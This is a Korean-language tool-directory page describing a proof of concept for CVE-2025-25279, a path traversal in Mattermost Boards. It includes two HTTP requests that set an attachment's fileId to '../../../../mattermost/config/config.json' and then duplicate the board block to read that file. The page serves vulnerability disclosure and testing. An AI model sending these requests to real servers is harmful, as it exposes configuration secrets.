Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-25279 — CVE-2025-25279에 대한 개념 증명: Mattermost Boards의 path traversal로 조작된 가져오기 아카이브 및 게시판 복제를 통해 임의 파일 읽기 허용 | Kitploit
도구/GitHubGitHub/numanturle/cve-2025-25279
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringMisconfiguration
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

CVE-2025-25279에 대한 개념 증명: Mattermost Boards의 path traversal로 조작된 가져오기 아카이브 및 게시판 복제를 통해 임의 파일 읽기 허용

저장소 보기
421년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

보안 권고 MMSA-2025-00430 / CVE-2025-25279

요약

Mattermost Boards에 파일을 업로드한 후, fileId 매개변수가 수정되고 보드가 복사되면, 파일은 매개변수에 지정된 대상 파일을 가리키며 다운로드됩니다.

영향 받는 버전: Boards가 활성화된 Mattermost 인스턴스 CVE: CVE-2025-25279

설명

Mattermost 버전 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2는 보드를 가져올 때 보드 블록을 제대로 검증하지 못하여, 공격자가 Boards에서 특별히 조작된 가져오기 아카이브를 가져오고 내보내는 것을 통해 시스템의 임의 파일을 읽을 수 있습니다.

스크린샷

스크린샷 1 스크린샷 2 스크린샷 3 스크린샷 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


참고 자료

  • Mattermost 보안 업데이트
  • CWE-200: 정보 노출
  • CVE-2025-25279

크레딧은 제 것이 아니며, 리뷰가 포함되어 있습니다.

도구 다운로드